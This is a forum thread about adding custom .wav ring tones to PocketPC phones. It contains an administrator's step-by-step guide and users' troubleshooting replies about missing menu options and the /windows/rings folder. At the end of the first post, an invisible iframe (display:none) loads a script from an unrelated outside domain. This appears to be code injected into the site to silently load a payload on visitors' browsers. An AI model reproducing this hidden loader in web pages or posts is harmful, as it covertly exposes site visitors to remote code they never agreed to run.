+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

How do I add custom ring tones?

One of the unique features of the PocketPC Phone is that you can add any .wav file as a ring tone. A .wav file is one of the most common audio file formats available and there are endless sources of them on the internet.

It is a four step process to add a custom ring tone:
    <ol>
    <li><b>Find and download the .wav file</b> - See Where can I find custom ring tones? for information on how to find custom ring tones. </li>
    <li><b>Download the ring tone to your PocketPC Phone</b> - You must move the .wav file from your desktop computer to the PocketPC Phone. The easiest way to do is is using Active Sync Explore. Active Sync Explore is used just like Windows Explorer and will let you work with files on your PocketPC Phone, from your desktop computer. You must be Connected for to use Active Sync Explore. You may place the file anywhere on the PocketPC. It is recommended that you place the files in a common directory. </li>
    <li><b>Add Ring Tone to Ring Tone Selection Box</b> - Using the Start menu, select Start -&gt; Settings. Then select the System tab. Select the icon for Add Ring Tone. This program will search your PocketPC and find all of the .wav files. Now, you simply find the .wav file that you would like to use for a ring tone, and tap the checkbox. Press OK to complete this step. </li>
    <li><b>Select Ring Tone</b> - Finally, you will want to pick the ring tone that you would like to use. Once .wav files have been added as ring tones, you can repeat this step to change between them. Using the Start menu, select Start -&gt; Settings. Then select the Personal tab (this is the default tab and is likely already selected). Select the icon for Phone. Select the drop down list for Ring type. and pick any of the choices that include "ring". Select the drop down list for Ring tone. The ring tone you picked in step 3 should be in the list. Once selected, it will immediately become your telephone ring tone. </li>
    </ol>
    More information:
    <a class="postlink" href="http://www.pocketpcmagic.com/rings.html#tut">PocketPC Magic Ring Tone Tutorial</a><iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

You can also manually copy the .wav file into the /windows/rings directory. I find this method of adding ring tones much faster, especially when adding multiples.

I don't know whether it's just my phone, but I don't find "Add Ring Tone" icon in my Settings Setup tab.

No add ring tone

I dont have the "add ring tone" app icon either.

Adding Ring Tones to i700

For the Samsung i700, you must add custom ring tones to /windows/Rings directory for them to be accessible as ringtones. There is no Add Ring Tones in System Settings.

Michael Ramm

just got one

I am not quite sure what you mean when you say /windows/ is that when you are in sync ?

This was the first thing I wanted to do for my i700
    When in sync, click on explore
    click on the pocket pc icon
    then the windows folder, down to the rings folder- on ur pc just drop the files into the folder and they will appear in the phone settings on the i7

One note and i am sure somebody can work this out make sure they are wav files not mp3, which is an easy conversion on ur pc

It is easy - if i can do it, anyone can

Boing

Originally posted by BruceJ
    I don't know whether it's just my phone, but I don't find "Add Ring Tone" icon in my Settings Setup tab.
    Check this thread to place the AddRingTone program to your i700. It does make your life a little easier.
    Jeremiah 29:11

I've figured out to add a sound file to the ringtones. But I can't select my custom sounds for the "incomming sms message" alert. Has anyone done that before?

i don't have an "add ring tone" for my hitachi g1000
    i learned how to sync it through windows media player on my computer....but now how do i make it a ringtone
    babydoll Tracy

Problem

Step 3 in the instructions will not work on my phone. I don't have a Add Ring button.

Question ringtones

I am trying to put custom ring tones on my pda phone. Its a samsung I700 running win2002. I was using another post
    (How do I add custom ring tones? by Convergent - 11-20-2002 10:48 PM )
    and I am having problems finding the ringtone folder in the system folder.. Do I need another program to run ringtones..

Thank you.

I found this out for pocket pc's

When you add music to your windows media player you can also record at the same time and then add to your ringtone folder.
    The sound is really good. I like it, and its pretty loud too soo yeah, try it...i have a audiovox pocketpc 6600
    babydoll Tracy

How do you add a ringtone to an entire category?

My phone doesn't have "add ring tones" as part of the menu-- the *.wav existing ring tones are in the windows folder; so i tried putting the new ring tones in that folder also and they did not show up when I go to the menu to change the ringer within "phone" options.
    Is there another way to do this?

Greetings, I would like to see my PCC6700,windows on my file explorer on my deskto .I see windows on the pda but cannot find it on my Windoes explorer.
    I want to add some notication & sounds extra sound rather than the stock one. Please Advise Thanks Rivitbob